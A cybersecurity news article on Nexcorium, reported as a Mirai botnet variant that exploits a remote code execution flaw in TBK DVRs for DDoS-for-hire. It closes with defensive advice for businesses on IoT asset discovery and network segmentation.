Nexcorium: A Vulnerability-Driven Mirai Variant Hijacking IoT for High-Volume DDoS
The classic Mirai botnet has evolved, weaponizing a critical RCE vulnerability in TBK-brand DVR devices to scale its destructive volumetric traffic capabilities.
TEL AVIV, ISRAEL — Cybersecurity researchers have identified a sophisticated new variant of the notorious Mirai botnet, dubbed Nexcorium, which is rapidly expanding its footprint by exploiting unpatched vulnerabilities in internet-connected Digital Video Recorders (DVRs). The campaign is notable for its move away from simple brute-force attacks on default passwords, instead focusing on high-precision exploit delivery to create a massive, coordinated Distributed Denial of Service (DDoS) weapon.
Analysis from Security Affairs and SC Media shows the malware currently has hardcoded targeting logic for systems manufactured by TBK, a major global supplier of video surveillance hardware.
Nexcorium Campaign Technical Breakdown
The Attack Vector: Exploiting the TBK Loophole
The defining feature of the Nexcorium campaign is its exploitation of CVE-2024-3721, a critical Remote Code Execution (RCE) flaw. This vulnerability lies within a specialized HTTP service running on TBK’s localized DVR models (DVR4104 and DVR4216).
By sending a single, crafted network request to the vulnerable service, attackers can execute arbitrary commands on the DVR without needing to authenticate.
Once breached, the device is immediately enrolled in the Nexcorium botnet:
- Automated Infection: A multi-stage dropper script is executed, which detects the device’s CPU architecture (e.g., MIPS, ARM, Intel) and downloads the corresponding specialized malware binary.
- C&C Architecture: Nexcorium utilizes a decentralized Command & Control (C&C) structure, often hiding its traffic within legitimate-looking peer-to-peer (P2P) network protocols, making it difficult to trace or shut down.
Volumetric DDoS: The Endgame
Unlike the original Mirai, which focused heavily on "TCP SYN" and "UDP Floods," analysis from BackBox indicates that Nexcorium includes several specialized application-layer attack vectors designed to overwhelm target websites and APIs. The malware’s primary objective appears to be fulfilling DDoS-for-hire contracts, generating high-volume traffic aimed at financial institutions, gaming networks, and other high-profile targets.
This shift to vulnerability-driven enrollment is a concerning maturation. "Brute-forcing works when users forget to change defaults, but exploiting an RCE flaw means even a security-conscious owner is a victim until they apply the patch," said a lead researcher in a Reddit InfoSecNews discussion.
The CyberSignal Analysis
Signal 01 — The Resurgence of the "IoT Squeeze"
Nexcorium is a powerful "Signal" that the risk associated with the IoT Supply Chain is reaching a boiling point. For B2B firms, the "Signal" is that these devices are not just endpoints; they are "Force Multipliers" for attackers. If your enterprise deploys surveillance hardware, HVAC controllers, or localized printers on an unprotected "Flat" network, those devices will eventually be weaponized in a larger campaign against your own clients.
Signal 02 — The Death of Brute-Force as a Primary Vector
The IoT landscape is hardening slightly, with newer devices enforcing password changes on setup. Attacker groups are adapting by shifting to vulnerability management. This means your asset discovery program must extend beyond traditional servers and laptops to include "Shadow IT" (e.g., the security cameras installed by a facilities team without IT oversight). If it has an IP address and runs a web service, it is a target.
